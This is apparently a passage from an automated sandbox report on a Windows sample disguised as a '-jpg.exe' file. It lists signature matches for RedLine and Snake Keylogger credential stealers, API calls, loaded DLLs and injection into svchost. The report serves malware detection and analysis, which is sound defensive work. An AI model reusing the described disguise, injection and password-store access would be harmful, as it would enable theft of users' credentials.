                Source: 2.2.svchost.exe.7d50f20.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.svchost.exe.7d50f20.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 00000000.00000002.2200420683.0000000003E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 00000002.00000002.4643358558.0000000007E10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000002.00000002.4643358558.0000000007E10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000002.00000002.4643358558.0000000007E10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000002.00000002.4637698281.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 00000002.00000002.4638852120.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000002.00000003.2199994951.0000000003271000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000002.00000003.2199994951.0000000003271000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000002.00000003.2199994951.0000000003271000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000002.00000002.4642986730.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000002.00000002.4642986730.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000002.00000002.4642986730.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: Process Memory Space: svchost.exe PID: 6256, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.3.svchost.exe.3271f20.0.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: 2.3.svchost.exe.3271f20.0.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: 2.3.svchost.exe.3271f20.0.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: 2.2.svchost.exe.7d50f20.3.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: 2.2.svchost.exe.7d50f20.3.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: 2.2.svchost.exe.7d50f20.3.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: 2.2.svchost.exe.7e10000.5.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: 2.2.svchost.exe.7e10000.5.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: 2.2.svchost.exe.7e10000.5.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: 2.2.svchost.exe.3374f2e.2.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: 2.2.svchost.exe.3374f2e.2.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: 2.2.svchost.exe.3374f2e.2.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/4@3/3
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,0_2_0047839D
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_000C3360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess,2_2_000C3360
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_000C3360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess,2_2_000C3360
                Source: C:\Windows\SysWOW64\svchost.exeMutant created: NULL
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeFile created: C:\Users\user\AppData\Local\Temp\autA8FC.tmpJump to behavior
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCommand line argument: #v0_2_0040D6B0
                Source: #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: svchost.exe, 00000002.00000002.4639663388.000000000576D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4639663388.000000000577C000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4639663388.00000000057AD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4639663388.000000000575E000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4639663388.00000000057A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeReversingLabs: Detection: 60%
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeFile read: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe "C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe"
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe"
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe"Jump to behavior
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Binary string: _.pdb source: svchost.exe, 00000002.00000002.4638852120.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4642986730.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2199994951.0000000003271000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe, 00000000.00000003.2196307095.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe, 00000000.00000003.2196502305.0000000004010000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe, 00000000.00000003.2196307095.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe, 00000000.00000003.2196502305.0000000004010000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: svchost.exe, svchost.exe, 00000002.00000002.4637584108.00000000000C1000.00000020.00000001.01000000.00000007.sdmp
                Source: Binary string: svchost.pdbUGP source: svchost.exe, 00000002.00000002.4637584108.00000000000C1000.00000020.00000001.01000000.00000007.sdmp
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
                Source: #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeStatic PE information: real checksum: 0xa961f should be: 0xdb40f
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_00402654 push 8B0000B1h; iretd 0_2_00402659
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041C40C push cs; iretd 2_2_0041C4E2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00423149 push eax; ret 2_2_00423179
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041C50E push cs; iretd 2_2_0041C4E2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004231C8 push eax; ret 2_2_00423179
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E21D push ecx; ret 2_2_0040E230
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041C6BE push ebx; ret 2_2_0041C6BF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_051FE558 push eax; iretd 2_2_051FE559
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_096A84C6 push 00000009h; retf 2_2_096A84C8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_000C3360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess,2_2_000C3360
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeAPI/Special instruction interceptor: Address: 3C3329C
                Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 51B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 5500000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 7500000 memory reserve | memory write watchJump to behavior
